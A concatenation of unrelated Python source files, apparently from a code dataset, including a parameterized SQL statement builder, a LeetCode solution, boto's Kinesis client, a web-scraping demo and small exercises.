    BASE_QUERY = 'SELECT {} FROM {} {}'

    def __init__(self, table, fields=None, where=None, order_by=None, limit=None):
        super().__init__()
        self.table = table
        self.fields = fields
        self.where = where
        self.order_by = order_by
        self.limit = limit

    def as_sql(self):
        """Return (query, params) for this SELECT."""
        # WHERE must be rendered first: it is the only tail part that
        # appends to self.params.
        tail_parts = [
            self.generate_query_where(self.where),
            self.generate_query_order_by(self.order_by),
            self.generate_query_limit(self.limit),
        ]
        tail = ' '.join(part for part in tail_parts if part)
        self.query = self.BASE_QUERY.format(
            self.generate_query_fields(self.fields),
            self.generate_query_field(self.table),
            tail,
        )
        return self.query, self.params
class DeleteStatement(BaseSQLStatement):
    """Builds a parameterized ``DELETE FROM ...`` statement."""

    BASE_QUERY = 'DELETE FROM {} {}'

    def __init__(self, table, where=None):
        super().__init__()
        self.table = table
        self.where = where

    def as_sql(self):
        """Return (query, params) for this DELETE."""
        self.query = self.BASE_QUERY.format(
            self.generate_query_field(self.table),
            self.generate_query_where(self.where),
        )
        return self.query, self.params
class CreateStatement(BaseSQLStatement):
    """Builds an INSERT / INSERT IGNORE / REPLACE statement.

    Values for fields listed in ``compress_fields`` are wrapped in
    MySQL's COMPRESS() on the way in.
    """

    BASE_QUERY = '{} INTO {} ({}) VALUES ({})'

    def __init__(self, table, assignments, mode, compress_fields):
        super().__init__()
        self.table = table
        self.assignments = assignments
        self.mode = mode
        self.compress_fields = compress_fields

    def generate_query_mode(self, mode):
        """Translate the public mode name into the SQL verb."""
        return {
            'INSERT': 'INSERT',
            'IGNORE': 'INSERT IGNORE',
            'REPLACE': 'REPLACE',
        }.get(mode)

    def generate_query_fields_values(self, assignments, compress_fields):
        """Render the column list and placeholder list, filling params."""
        compressed = set()
        if type(compress_fields) == list:
            # Assignment fields are already quoted, e.g. '`id`'.
            compressed = {'`' + cf + '`' for cf in compress_fields}
        fields = []
        placeholders = []
        for a in assignments:
            fields.append(a.field)
            placeholders.append(
                'COMPRESS(%s)' if a.field in compressed else '%s')
            self.params.append(a.value)
        return ', '.join(fields), ', '.join(placeholders)

    def as_sql(self):
        """Return (query, params) for this INSERT/REPLACE."""
        query_fields, query_values = self.generate_query_fields_values(
            self.assignments, self.compress_fields)
        self.query = self.BASE_QUERY.format(
            self.generate_query_mode(self.mode),
            self.generate_query_field(self.table),
            query_fields,
            query_values,
        )
        return self.query, self.params
class UpdateStatement(BaseSQLStatement):
    """Builds a parameterized ``UPDATE ... SET ...`` statement."""

    BASE_QUERY = 'UPDATE {} SET {} {}'

    def __init__(self, table, assignments, where=None):
        super().__init__()
        self.table = table
        self.assignments = assignments
        self.where = where

    def generate_query_fields_values(self, assignments):
        """Render the SET list, appending values to self.params."""
        pieces = []
        for a in assignments:
            pieces.append(a.field + '=%s')
            self.params.append(a.value)
        return ', '.join(pieces)

    def as_sql(self):
        """Return (query, params); SET values precede WHERE values."""
        set_clause = self.generate_query_fields_values(self.assignments)
        where_clause = self.generate_query_where(self.where)
        self.query = self.BASE_QUERY.format(
            self.generate_query_field(self.table),
            set_clause,
            where_clause,
        )
        return self.query, self.params
def where_clauses_from_filters(filters):
    """Turn (operator, field, value) triples into WhereClause objects."""
    return [WhereClause(field, op, value) for op, field, value in filters]
def assignment_clauses_clauses_from_filters(data):
    """Turn a {field: value} mapping into AssignmentClause objects.

    (The doubled name is kept for backward compatibility.)
    """
    return [AssignmentClause(field, value) for field, value in data.items()]
def query_parameters_from_create(collection, data, mode='INSERT', compress_fields=None):
    """Build (query, params) for inserting ``data`` into ``collection``."""
    statement = CreateStatement(
        FieldClause(collection),
        assignment_clauses_clauses_from_filters(data),
        mode,
        compress_fields,
    )
    return statement.as_sql()
def query_parameters_from_update(collection, filters, data):
    """Build (query, params) updating rows matching ``filters`` with ``data``."""
    statement = UpdateStatement(
        FieldClause(collection),
        assignment_clauses_clauses_from_filters(data),
        where_clauses_from_filters(filters),
    )
    return statement.as_sql()
def query_parameters_from_get(collection, filters, fields=None):
    """Build (query, params) fetching a single row matching ``filters``."""
    statement = SelectStatement(
        FieldClause(collection),
        [FieldClause(name) for name in (fields or [])],
        where_clauses_from_filters(filters),
        limit=1,
    )
    return statement.as_sql()
def query_parameters_from_delete(collection, filters):
    """Build (query, params) deleting rows matching ``filters``."""
    statement = DeleteStatement(
        FieldClause(collection),
        where_clauses_from_filters(filters),
    )
    return statement.as_sql()
def query_parameters_from_filter(
        collection, filters, fields=None, order_by=None, limit=None):
    """Build (query, params) for a filtered, ordered, limited SELECT.

    ``order_by`` may be None, a single field name, or a list of names;
    a leading '-' on a name requests descending order.
    """
    if order_by is None:
        order_names = []
    elif isinstance(order_by, str):
        order_names = [order_by]
    else:
        order_names = order_by
    statement = SelectStatement(
        FieldClause(collection),
        [FieldClause(name) for name in (fields or [])],
        where_clauses_from_filters(filters),
        [FieldClause(name) for name in order_names],
        limit,
    )
    return statement.as_sql()
| 2.90625 | 3 |
solutions/2121.py | pacokwon/leetcode | 2 | 12770756 | # Intervals Between Identical Elements
from typing import List
from collections import defaultdict
class Solution:
    """LeetCode 2121: for each index i, the sum of |i - j| over all j
    with arr[j] == arr[i] (j != i)."""

    def getDistances(self, arr: List[int]) -> List[int]:
        # Group the positions of each distinct value (positions are
        # collected in increasing order).
        positions = defaultdict(list)
        for pos, value in enumerate(arr):
            positions[value].append(pos)

        result = [0] * len(arr)
        for pos_list in positions.values():
            count = len(pos_list)
            # Left-to-right pass: total distance to earlier equal indices.
            running = 0
            for k in range(count):
                result[pos_list[k]] += k * pos_list[k] - running
                running += pos_list[k]
            # Right-to-left pass: total distance to later equal indices.
            running = 0
            for k in range(count - 1, -1, -1):
                result[pos_list[k]] += running - (count - 1 - k) * pos_list[k]
                running += pos_list[k]
        return result
if __name__ == "__main__":
    # Quick manual check against the second LeetCode example.
    # (Removed a dead assignment of the first example that was
    # immediately overwritten and never used.)
    sol = Solution()
    arr = [10, 5, 10, 10]
    print(sol.getDistances(arr))
| 3.421875 | 3 |
boto/kinesis/layer1.py | Grindizer/boto | 6 | 12770757 | # Copyright (c) 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import base64
import boto
from boto.connection import AWSQueryConnection
from boto.regioninfo import RegionInfo
from boto.exception import JSONResponseError
from boto.kinesis import exceptions
from boto.compat import json
class KinesisConnection(AWSQueryConnection):
"""
Amazon Kinesis Service API Reference
Amazon Kinesis is a managed service that scales elastically for
real time processing of streaming big data.
"""
APIVersion = "2013-12-02"
DefaultRegionName = "us-east-1"
DefaultRegionEndpoint = "kinesis.us-east-1.amazonaws.com"
ServiceName = "Kinesis"
TargetPrefix = "Kinesis_20131202"
ResponseError = JSONResponseError
_faults = {
"ProvisionedThroughputExceededException": exceptions.ProvisionedThroughputExceededException,
"LimitExceededException": exceptions.LimitExceededException,
"ExpiredIteratorException": exceptions.ExpiredIteratorException,
"ResourceInUseException": exceptions.ResourceInUseException,
"ResourceNotFoundException": exceptions.ResourceNotFoundException,
"InvalidArgumentException": exceptions.InvalidArgumentException,
"SubscriptionRequiredException": exceptions.SubscriptionRequiredException
}
def __init__(self, **kwargs):
region = kwargs.pop('region', None)
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionEndpoint)
if 'host' not in kwargs:
kwargs['host'] = region.endpoint
super(KinesisConnection, self).__init__(**kwargs)
self.region = region
    def _required_auth_capability(self):
        # Kinesis requires Signature Version 4 request signing.
        return ['hmac-v4']
def create_stream(self, stream_name, shard_count):
"""
This operation adds a new Amazon Kinesis stream to your AWS
account. A stream captures and transports data records that
are continuously emitted from different data sources or
producers . Scale-out within an Amazon Kinesis stream is
explicitly supported by means of shards, which are uniquely
identified groups of data records in an Amazon Kinesis stream.
You specify and control the number of shards that a stream is
composed of. Each shard can support up to 5 read transactions
per second up to a maximum total of 2 MB of data read per
second. Each shard can support up to 1000 write transactions
per second up to a maximum total of 1 MB data written per
second. You can add shards to a stream if the amount of data
input increases and you can remove shards if the amount of
data input decreases.
The stream name identifies the stream. The name is scoped to
the AWS account used by the application. It is also scoped by
region. That is, two streams in two different accounts can
have the same name, and two streams in the same account, but
in two different regions, can have the same name.
`CreateStream` is an asynchronous operation. Upon receiving a
`CreateStream` request, Amazon Kinesis immediately returns and
sets the stream status to CREATING. After the stream is
created, Amazon Kinesis sets the stream status to ACTIVE. You
should perform read and write operations only on an ACTIVE
stream.
You receive a `LimitExceededException` when making a
`CreateStream` request if you try to do one of the following:
+ Have more than five streams in the CREATING state at any
point in time.
+ Create more shards than are authorized for your account.
**Note:** The default limit for an AWS account is two shards
per stream. If you need to create a stream with more than two
shards, contact AWS Support to increase the limit on your
account.
You can use the `DescribeStream` operation to check the stream
status, which is returned in `StreamStatus`.
`CreateStream` has a limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: A name to identify the stream. The stream name is
scoped to the AWS account used by the application that creates the
stream. It is also scoped by region. That is, two streams in two
different AWS accounts can have the same name, and two streams in
the same AWS account, but in two different regions, can have the
same name.
:type shard_count: integer
:param shard_count: The number of shards that the stream will use. The
throughput of the stream is a function of the number of shards;
more shards are required for greater provisioned throughput.
**Note:** The default limit for an AWS account is two shards per
stream. If you need to create a stream with more than two shards,
contact AWS Support to increase the limit on your account.
"""
params = {
'StreamName': stream_name,
'ShardCount': shard_count,
}
return self.make_request(action='CreateStream',
body=json.dumps(params))
def delete_stream(self, stream_name):
"""
This operation deletes a stream and all of its shards and
data. You must shut down any applications that are operating
on the stream before you delete the stream. If an application
attempts to operate on a deleted stream, it will receive the
exception `ResourceNotFoundException`.
If the stream is in the ACTIVE state, you can delete it. After
a `DeleteStream` request, the specified stream is in the
DELETING state until Amazon Kinesis completes the deletion.
**Note:** Amazon Kinesis might continue to accept data read
and write operations, such as PutRecord and GetRecords, on a
stream in the DELETING state until the stream deletion is
complete.
When you delete a stream, any shards in that stream are also
deleted.
You can use the DescribeStream operation to check the state of
the stream, which is returned in `StreamStatus`.
`DeleteStream` has a limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream to delete.
"""
params = {'StreamName': stream_name, }
return self.make_request(action='DeleteStream',
body=json.dumps(params))
def describe_stream(self, stream_name, limit=None,
exclusive_start_shard_id=None):
"""
This operation returns the following information about the
stream: the current status of the stream, the stream Amazon
Resource Name (ARN), and an array of shard objects that
comprise the stream. For each shard object there is
information about the hash key and sequence number ranges that
the shard spans, and the IDs of any earlier shards that played
in a role in a MergeShards or SplitShard operation that
created the shard. A sequence number is the identifier
associated with every record ingested in the Amazon Kinesis
stream. The sequence number is assigned by the Amazon Kinesis
service when a record is put into the stream.
You can limit the number of returned shards using the `Limit`
parameter. The number of shards in a stream may be too large
to return from a single call to `DescribeStream`. You can
detect this by using the `HasMoreShards` flag in the returned
output. `HasMoreShards` is set to `True` when there is more
data available.
If there are more shards available, you can request more
shards by using the shard ID of the last shard returned by the
`DescribeStream` request, in the `ExclusiveStartShardId`
parameter in a subsequent request to `DescribeStream`.
`DescribeStream` is a paginated operation.
`DescribeStream` has a limit of 10 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream to describe.
:type limit: integer
:param limit: The maximum number of shards to return.
:type exclusive_start_shard_id: string
:param exclusive_start_shard_id: The shard ID of the shard to start
with for the stream description.
"""
params = {'StreamName': stream_name, }
if limit is not None:
params['Limit'] = limit
if exclusive_start_shard_id is not None:
params['ExclusiveStartShardId'] = exclusive_start_shard_id
return self.make_request(action='DescribeStream',
body=json.dumps(params))
def get_records(self, shard_iterator, limit=None, b64_decode=True):
"""
This operation returns one or more data records from a shard.
A `GetRecords` operation request can retrieve up to 10 MB of
data.
You specify a shard iterator for the shard that you want to
read data from in the `ShardIterator` parameter. The shard
iterator specifies the position in the shard from which you
want to start reading data records sequentially. A shard
iterator specifies this position using the sequence number of
a data record in the shard. For more information about the
shard iterator, see GetShardIterator.
`GetRecords` may return a partial result if the response size
limit is exceeded. You will get an error, but not a partial
result if the shard's provisioned throughput is exceeded, the
shard iterator has expired, or an internal processing failure
has occurred. Clients can request a smaller amount of data by
specifying a maximum number of returned records using the
`Limit` parameter. The `Limit` parameter can be set to an
integer value of up to 10,000. If you set the value to an
integer greater than 10,000, you will receive
`InvalidArgumentException`.
A new shard iterator is returned by every `GetRecords` request
in `NextShardIterator`, which you use in the `ShardIterator`
parameter of the next `GetRecords` request. When you
repeatedly read from an Amazon Kinesis stream use a
GetShardIterator request to get the first shard iterator to
use in your first `GetRecords` request and then use the shard
iterator returned in `NextShardIterator` for subsequent reads.
`GetRecords` can return `null` for the `NextShardIterator` to
reflect that the shard has been closed and that the requested
shard iterator would never have returned more data.
If no items can be processed because of insufficient
provisioned throughput on the shard involved in the request,
`GetRecords` throws `ProvisionedThroughputExceededException`.
:type shard_iterator: string
:param shard_iterator: The position in the shard from which you want to
start sequentially reading data records.
:type limit: integer
:param limit: The maximum number of records to return, which can be set
to a value of up to 10,000.
:type b64_decode: boolean
:param b64_decode: Decode the Base64-encoded ``Data`` field of records.
"""
params = {'ShardIterator': shard_iterator, }
if limit is not None:
params['Limit'] = limit
response = self.make_request(action='GetRecords',
body=json.dumps(params))
# Base64 decode the data
if b64_decode:
for record in response.get('Records', []):
record['Data'] = base64.b64decode(
record['Data'].encode('utf-8')).decode('utf-8')
return response
def get_shard_iterator(self, stream_name, shard_id, shard_iterator_type,
starting_sequence_number=None):
"""
This operation returns a shard iterator in `ShardIterator`.
The shard iterator specifies the position in the shard from
which you want to start reading data records sequentially. A
shard iterator specifies this position using the sequence
number of a data record in a shard. A sequence number is the
identifier associated with every record ingested in the Amazon
Kinesis stream. The sequence number is assigned by the Amazon
Kinesis service when a record is put into the stream.
You must specify the shard iterator type in the
`GetShardIterator` request. For example, you can set the
`ShardIteratorType` parameter to read exactly from the
position denoted by a specific sequence number by using the
AT_SEQUENCE_NUMBER shard iterator type, or right after the
sequence number by using the AFTER_SEQUENCE_NUMBER shard
iterator type, using sequence numbers returned by earlier
PutRecord, GetRecords or DescribeStream requests. You can
specify the shard iterator type TRIM_HORIZON in the request to
cause `ShardIterator` to point to the last untrimmed record in
the shard in the system, which is the oldest data record in
the shard. Or you can point to just after the most recent
record in the shard, by using the shard iterator type LATEST,
so that you always read the most recent data in the shard.
**Note:** Each shard iterator expires five minutes after it is
returned to the requester.
When you repeatedly read from an Amazon Kinesis stream use a
GetShardIterator request to get the first shard iterator to to
use in your first `GetRecords` request and then use the shard
iterator returned by the `GetRecords` request in
`NextShardIterator` for subsequent reads. A new shard iterator
is returned by every `GetRecords` request in
`NextShardIterator`, which you use in the `ShardIterator`
parameter of the next `GetRecords` request.
If a `GetShardIterator` request is made too often, you will
receive a `ProvisionedThroughputExceededException`. For more
information about throughput limits, see the `Amazon Kinesis
Developer Guide`_.
`GetShardIterator` can return `null` for its `ShardIterator`
to indicate that the shard has been closed and that the
requested iterator will return no more data. A shard can be
closed by a SplitShard or MergeShards operation.
`GetShardIterator` has a limit of 5 transactions per second
per account per shard.
:type stream_name: string
:param stream_name: The name of the stream.
:type shard_id: string
:param shard_id: The shard ID of the shard to get the iterator for.
:type shard_iterator_type: string
:param shard_iterator_type:
Determines how the shard iterator is used to start reading data records
from the shard.
The following are the valid shard iterator types:
+ AT_SEQUENCE_NUMBER - Start reading exactly from the position denoted
by a specific sequence number.
+ AFTER_SEQUENCE_NUMBER - Start reading right after the position
denoted by a specific sequence number.
+ TRIM_HORIZON - Start reading at the last untrimmed record in the
shard in the system, which is the oldest data record in the shard.
+ LATEST - Start reading just after the most recent record in the
shard, so that you always read the most recent data in the shard.
:type starting_sequence_number: string
:param starting_sequence_number: The sequence number of the data record
in the shard from which to start reading from.
"""
params = {
'StreamName': stream_name,
'ShardId': shard_id,
'ShardIteratorType': shard_iterator_type,
}
if starting_sequence_number is not None:
params['StartingSequenceNumber'] = starting_sequence_number
return self.make_request(action='GetShardIterator',
body=json.dumps(params))
def list_streams(self, limit=None, exclusive_start_stream_name=None):
"""
This operation returns an array of the names of all the
streams that are associated with the AWS account making the
`ListStreams` request. A given AWS account can have many
streams active at one time.
The number of streams may be too large to return from a single
call to `ListStreams`. You can limit the number of returned
streams using the `Limit` parameter. If you do not specify a
value for the `Limit` parameter, Amazon Kinesis uses the
default limit, which is currently 10.
You can detect if there are more streams available to list by
using the `HasMoreStreams` flag from the returned output. If
there are more streams available, you can request more streams
by using the name of the last stream returned by the
`ListStreams` request in the `ExclusiveStartStreamName`
parameter in a subsequent request to `ListStreams`. The group
of stream names returned by the subsequent request is then
added to the list. You can continue this process until all the
stream names have been collected in the list.
`ListStreams` has a limit of 5 transactions per second per
account.
:type limit: integer
:param limit: The maximum number of streams to list.
:type exclusive_start_stream_name: string
:param exclusive_start_stream_name: The name of the stream to start the
list with.
"""
params = {}
if limit is not None:
params['Limit'] = limit
if exclusive_start_stream_name is not None:
params['ExclusiveStartStreamName'] = exclusive_start_stream_name
return self.make_request(action='ListStreams',
body=json.dumps(params))
def merge_shards(self, stream_name, shard_to_merge,
adjacent_shard_to_merge):
"""
This operation merges two adjacent shards in a stream and
combines them into a single shard to reduce the stream's
capacity to ingest and transport data. Two shards are
considered adjacent if the union of the hash key ranges for
the two shards form a contiguous set with no gaps. For
example, if you have two shards, one with a hash key range of
276...381 and the other with a hash key range of 382...454,
then you could merge these two shards into a single shard that
would have a hash key range of 276...454. After the merge, the
single child shard receives data for all hash key values
covered by the two parent shards.
`MergeShards` is called when there is a need to reduce the
overall capacity of a stream because of excess capacity that
is not being used. The operation requires that you specify the
shard to be merged and the adjacent shard for a given stream.
For more information about merging shards, see the `Amazon
Kinesis Developer Guide`_.
If the stream is in the ACTIVE state, you can call
`MergeShards`. If a stream is in CREATING or UPDATING or
DELETING states, then Amazon Kinesis returns a
`ResourceInUseException`. If the specified stream does not
exist, Amazon Kinesis returns a `ResourceNotFoundException`.
You can use the DescribeStream operation to check the state of
the stream, which is returned in `StreamStatus`.
`MergeShards` is an asynchronous operation. Upon receiving a
`MergeShards` request, Amazon Kinesis immediately returns a
response and sets the `StreamStatus` to UPDATING. After the
operation is completed, Amazon Kinesis sets the `StreamStatus`
to ACTIVE. Read and write operations continue to work while
the stream is in the UPDATING state.
You use the DescribeStream operation to determine the shard
IDs that are specified in the `MergeShards` request.
If you try to operate on too many streams in parallel using
CreateStream, DeleteStream, `MergeShards` or SplitShard, you
will receive a `LimitExceededException`.
`MergeShards` has limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream for the merge.
:type shard_to_merge: string
:param shard_to_merge: The shard ID of the shard to combine with the
adjacent shard for the merge.
:type adjacent_shard_to_merge: string
:param adjacent_shard_to_merge: The shard ID of the adjacent shard for
the merge.
"""
params = {
'StreamName': stream_name,
'ShardToMerge': shard_to_merge,
'AdjacentShardToMerge': adjacent_shard_to_merge,
}
return self.make_request(action='MergeShards',
body=json.dumps(params))
def put_record(self, stream_name, data, partition_key,
explicit_hash_key=None,
sequence_number_for_ordering=None,
exclusive_minimum_sequence_number=None,
b64_encode=True):
"""
This operation puts a data record into an Amazon Kinesis
stream from a producer. This operation must be called to send
data from the producer into the Amazon Kinesis stream for
real-time ingestion and subsequent processing. The `PutRecord`
operation requires the name of the stream that captures,
stores, and transports the data; a partition key; and the data
blob itself. The data blob could be a segment from a log file,
geographic/location data, website clickstream data, or any
other data type.
The partition key is used to distribute data across shards.
Amazon Kinesis segregates the data records that belong to a
data stream into multiple shards, using the partition key
associated with each data record to determine which shard a
given data record belongs to.
Partition keys are Unicode strings, with a maximum length
limit of 256 bytes. An MD5 hash function is used to map
partition keys to 128-bit integer values and to map associated
data records to shards using the hash key ranges of the
shards. You can override hashing the partition key to
determine the shard by explicitly specifying a hash value
using the `ExplicitHashKey` parameter. For more information,
see the `Amazon Kinesis Developer Guide`_.
`PutRecord` returns the shard ID of where the data record was
placed and the sequence number that was assigned to the data
record.
Sequence numbers generally increase over time. To guarantee
strictly increasing ordering, use the
`SequenceNumberForOrdering` parameter. For more information,
see the `Amazon Kinesis Developer Guide`_.
If a `PutRecord` request cannot be processed because of
insufficient provisioned throughput on the shard involved in
the request, `PutRecord` throws
`ProvisionedThroughputExceededException`.
Data records are accessible for only 24 hours from the time
that they are added to an Amazon Kinesis stream.
:type stream_name: string
:param stream_name: The name of the stream to put the data record into.
:type data: blob
:param data: The data blob to put into the record, which is
Base64-encoded when the blob is serialized.
The maximum size of the data blob (the payload after
Base64-decoding) is 50 kilobytes (KB)
Set `b64_encode` to disable automatic Base64 encoding.
:type partition_key: string
:param partition_key: Determines which shard in the stream the data
record is assigned to. Partition keys are Unicode strings with a
maximum length limit of 256 bytes. Amazon Kinesis uses the
partition key as input to a hash function that maps the partition
key and associated data to a specific shard. Specifically, an MD5
hash function is used to map partition keys to 128-bit integer
values and to map associated data records to shards. As a result of
this hashing mechanism, all data records with the same partition
key will map to the same shard within the stream.
:type explicit_hash_key: string
:param explicit_hash_key: The hash value used to explicitly determine
the shard the data record is assigned to by overriding the
partition key hash.
:type sequence_number_for_ordering: string
:param sequence_number_for_ordering: Guarantees strictly increasing
sequence numbers, for puts from the same client and to the same
partition key. Usage: set the `SequenceNumberForOrdering` of record
n to the sequence number of record n-1 (as returned in the
PutRecordResult when putting record n-1 ). If this parameter is not
set, records will be coarsely ordered based on arrival time.
:type b64_encode: boolean
:param b64_encode: Whether to Base64 encode `data`. Can be set to
``False`` if `data` is already encoded to prevent double encoding.
"""
params = {
'StreamName': stream_name,
'Data': data,
'PartitionKey': partition_key,
}
if explicit_hash_key is not None:
params['ExplicitHashKey'] = explicit_hash_key
if sequence_number_for_ordering is not None:
params['SequenceNumberForOrdering'] = sequence_number_for_ordering
if b64_encode:
params['Data'] = base64.b64encode(
params['Data'].encode('utf-8')).decode('utf-8')
return self.make_request(action='PutRecord',
body=json.dumps(params))
def split_shard(self, stream_name, shard_to_split, new_starting_hash_key):
"""
This operation splits a shard into two new shards in the
stream, to increase the stream's capacity to ingest and
transport data. `SplitShard` is called when there is a need to
increase the overall capacity of stream because of an expected
increase in the volume of data records being ingested.
`SplitShard` can also be used when a given shard appears to be
approaching its maximum utilization, for example, when the set
of producers sending data into the specific shard are suddenly
sending more than previously anticipated. You can also call
the `SplitShard` operation to increase stream capacity, so
that more Amazon Kinesis applications can simultaneously read
data from the stream for real-time processing.
The `SplitShard` operation requires that you specify the shard
to be split and the new hash key, which is the position in the
shard where the shard gets split in two. In many cases, the
new hash key might simply be the average of the beginning and
ending hash key, but it can be any hash key value in the range
being mapped into the shard. For more information about
splitting shards, see the `Amazon Kinesis Developer Guide`_.
You can use the DescribeStream operation to determine the
shard ID and hash key values for the `ShardToSplit` and
`NewStartingHashKey` parameters that are specified in the
`SplitShard` request.
`SplitShard` is an asynchronous operation. Upon receiving a
`SplitShard` request, Amazon Kinesis immediately returns a
response and sets the stream status to UPDATING. After the
operation is completed, Amazon Kinesis sets the stream status
to ACTIVE. Read and write operations continue to work while
the stream is in the UPDATING state.
You can use `DescribeStream` to check the status of the
stream, which is returned in `StreamStatus`. If the stream is
in the ACTIVE state, you can call `SplitShard`. If a stream is
in CREATING or UPDATING or DELETING states, then Amazon
Kinesis returns a `ResourceInUseException`.
If the specified stream does not exist, Amazon Kinesis returns
a `ResourceNotFoundException`. If you try to create more
shards than are authorized for your account, you receive a
`LimitExceededException`.
**Note:** The default limit for an AWS account is two shards
per stream. If you need to create a stream with more than two
shards, contact AWS Support to increase the limit on your
account.
If you try to operate on too many streams in parallel using
CreateStream, DeleteStream, MergeShards or SplitShard, you
will receive a `LimitExceededException`.
`SplitShard` has limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream for the shard split.
:type shard_to_split: string
:param shard_to_split: The shard ID of the shard to split.
:type new_starting_hash_key: string
:param new_starting_hash_key: A hash key value for the starting hash
key of one of the child shards created by the split. The hash key
range for a given shard constitutes a set of ordered contiguous
positive integers. The value for `NewStartingHashKey` must be in
the range of hash keys being mapped into the shard. The
`NewStartingHashKey` hash key value and all higher hash key values
in hash key range are distributed to one of the child shards. All
the lower hash key values in the range are distributed to the other
child shard.
"""
params = {
'StreamName': stream_name,
'ShardToSplit': shard_to_split,
'NewStartingHashKey': new_starting_hash_key,
}
return self.make_request(action='SplitShard',
body=json.dumps(params))
    def make_request(self, action, body):
        """POST a JSON-1.1 request to the Kinesis endpoint and decode the reply.

        :param action: API operation name; combined with ``TargetPrefix`` to
            form the ``X-Amz-Target`` header.
        :param body: JSON-serialized request payload.
        :returns: the decoded JSON response on HTTP 200 with a non-empty
            body; implicitly ``None`` when a 200 response has an empty body.
        :raises: the mapped fault class from ``self._faults`` (falling back
            to ``self.ResponseError``) on any non-200 status.
        """
        headers = {
            'X-Amz-Target': '%s.%s' % (self.TargetPrefix, action),
            'Host': self.region.endpoint,
            'Content-Type': 'application/x-amz-json-1.1',
            'Content-Length': str(len(body)),
        }
        # Build an unsigned base request; _mexe signs, sends and retries it
        # (up to 10 attempts) before returning the HTTP response object.
        http_request = self.build_base_http_request(
            method='POST', path='/', auth_path='/', params={},
            headers=headers, data=body)
        response = self._mexe(http_request, sender=None,
                              override_num_retries=10)
        response_body = response.read().decode('utf-8')
        boto.log.debug(response.getheaders())
        boto.log.debug(response_body)
        if response.status == 200:
            if response_body:
                return json.loads(response_body)
            # NOTE: an empty 200 body falls through and returns None.
        else:
            # Error payloads carry the fault class name in '__type'; map it
            # to the matching exception class registered on this connection.
            json_body = json.loads(response_body)
            fault_name = json_body.get('__type', None)
            exception_class = self._faults.get(fault_name, self.ResponseError)
            raise exception_class(response.status, response.reason,
                                  body=json_body)
| 1.625 | 2 |
src/hierarchy/stationary.py | drvinceknight/HierarchicalPromotion | 0 | 12770758 | import numpy as np
import hierarchy as hrcy
def get_stationary_distribution(capacities, r, lmbda, mu):
assert capacities[-1] == 1
matrix = hrcy.transitions.get_transition_matrix(
capacities=capacities, r=r, lmbda=lmbda, mu=mu
)
dimension = matrix.shape[0]
M = np.vstack((matrix.transpose(), np.ones(dimension)))
b = np.vstack((np.zeros((dimension, 1)), [1]))
return np.linalg.lstsq(M, b)[0].transpose()[0]
| 2.484375 | 2 |
Day_14_Web_Automation/using_soup.py | ValRCS/Python_TietoEvry_Sep2021 | 0 | 12770759 | import requests
from bs4 import BeautifulSoup as bs

# Demo script: fetch a small MDN example page and explore it with
# BeautifulSoup (title, first headline, image attributes).
url = "https://mdn.github.io/beginner-html-site/"

response = requests.get(url) # this is like going to our browser and going to the url
print(response.status_code) # 200 would be good 404 would be bad
print(response.text[:500]) # first 500 characters

# i could parse by hand but i can use beautiful soup
# # we parse our raw text html into a soup object
soup = bs(response.text, "html.parser") # html parser is optional we can tell it use lxml which might be better parser
print(soup.title)
print(type(soup))
headline = soup.find("h1") # there should only be one h1 tag in the html
print(headline)
# NOTE(review): find() returns None when no <h1> exists, which would make
# the next line raise AttributeError — fine for this known page.
print(headline.text) # gets you text
images = soup.find_all("img") # get all images tags
print(images)
print(len(images))
# we would want some logic here to test length of images
if len(images) > 0:
    first_image = images[0]
    print(first_image.attrs)
    for key, value in first_image.attrs.items(): # attrs is a dictionary
        print("attribute", key, "value:", value)
| 3.703125 | 4 |
regtests/test-all.py | ahakingdom/Rusthon | 622 | 12770760 | <filename>regtests/test-all.py
import os
import subprocess
import sys

# Run all regression-test drivers from the directory this script lives in.
os.chdir(os.path.split(__file__)[0])

# Use the same interpreter that is running this script: the bare 'python'
# command may be missing or resolve to a different (e.g. Python 2)
# interpreter on some systems.  check_call raises on the first failure.
for script in ('test-c++.py', 'test-go.py', 'test-javascript.py',
               'test-markdowns.py'):
    subprocess.check_call([sys.executable, script])
| 2.109375 | 2 |
Trabalhos/Python/MiniEP/coordenada.py | phelipes2000/Ola-Mundo | 0 | 12770761 | <gh_stars>0
def coord(x, y):
    """Print (in Portuguese) which quadrant the point ``(x, y)`` lies in.

    Raises:
        ValueError: if the point lies on an axis (``x == 0`` or ``y == 0``),
            since it belongs to no quadrant.  The original code left ``i``
            unassigned in that case and crashed with UnboundLocalError at
            the print statement.
    """
    if x == 0 or y == 0:
        raise ValueError(
            "ponto sobre um eixo nao pertence a nenhum quadrante")
    if x > 0 and y > 0:
        quadrante = "I"
    elif x > 0 and y < 0:
        quadrante = "IV"
    elif x < 0 and y < 0:
        quadrante = "III"
    else:  # x < 0 and y > 0 is the only remaining case
        quadrante = "II"
    print(f"O ponto ({x:.0f}, {y:.0f}) pertence ao quadrante: {quadrante}")
    print(" ")
def main():
    # Interactive entry point: read the two coordinates from stdin and
    # report the quadrant.  Non-numeric input raises ValueError from float().
    a = float(input("Digite um valor para x: "))
    b = float(input("Digite um valor para y: "))
    print("")
    coord(a,b)
#--------------
#~~phelipes2000 | 3.8125 | 4 |
